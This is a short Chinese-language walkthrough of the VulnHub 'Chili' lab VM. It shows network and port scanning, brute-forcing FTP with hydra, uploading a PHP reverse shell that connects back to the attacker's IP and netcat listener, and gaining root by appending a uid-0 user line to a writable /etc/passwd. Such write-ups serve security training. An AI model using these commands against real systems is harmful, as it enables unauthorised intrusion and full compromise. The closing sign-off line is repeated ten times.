vulnhub之Chili的實踐
今天實踐的是vulnhub的Chili鏡像,
下載地址,https://download.vulnhub.com/chili/Chili.ova,
用workstation導入,做地址掃描,sudo netdiscover -r 192.168.58.0/24,
170就是靶機,

繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.170,

有ftp服務,沒掃描到匿名賬戶,上hydra做密碼暴破,用戶名就用chili,
hydra 192.168.58.170 ftp -l chili -P /usr/share/wordlists/rockyou.txt,
獲取到用戶名密碼,chili/a1b2c3d4,

ftp登錄進去,發現可文件上傳的目錄,/var/www/html/.nano,
直接用kali上自帶的web shell文件,
cp /usr/share/webshells/php/php-reverse-shell.php shell.php,
修改好參數,
$ip = '192.168.58.168'; // CHANGE THIS
$port = 4444; // CHANGE THIS
上傳到ftp服務的/var/www/html/.nano里,

kali攻擊機上開個反彈shell監聽,nc -lvp 4444,
瀏覽器訪問http://192.168.58.170/.nano/shell.php,
反彈shell就過來了,
改成交互式shell,python3 -c 'import pty; pty.spawn("/bin/bash")',
發現passwd文件在當前用戶下是可寫的,ls -lna /etc/passwd,
造一個root權限的用戶進去,
echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> /etc/passwd,
切到hacker用戶,su hacker,id確認是root,

本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束,本期實踐到此結束。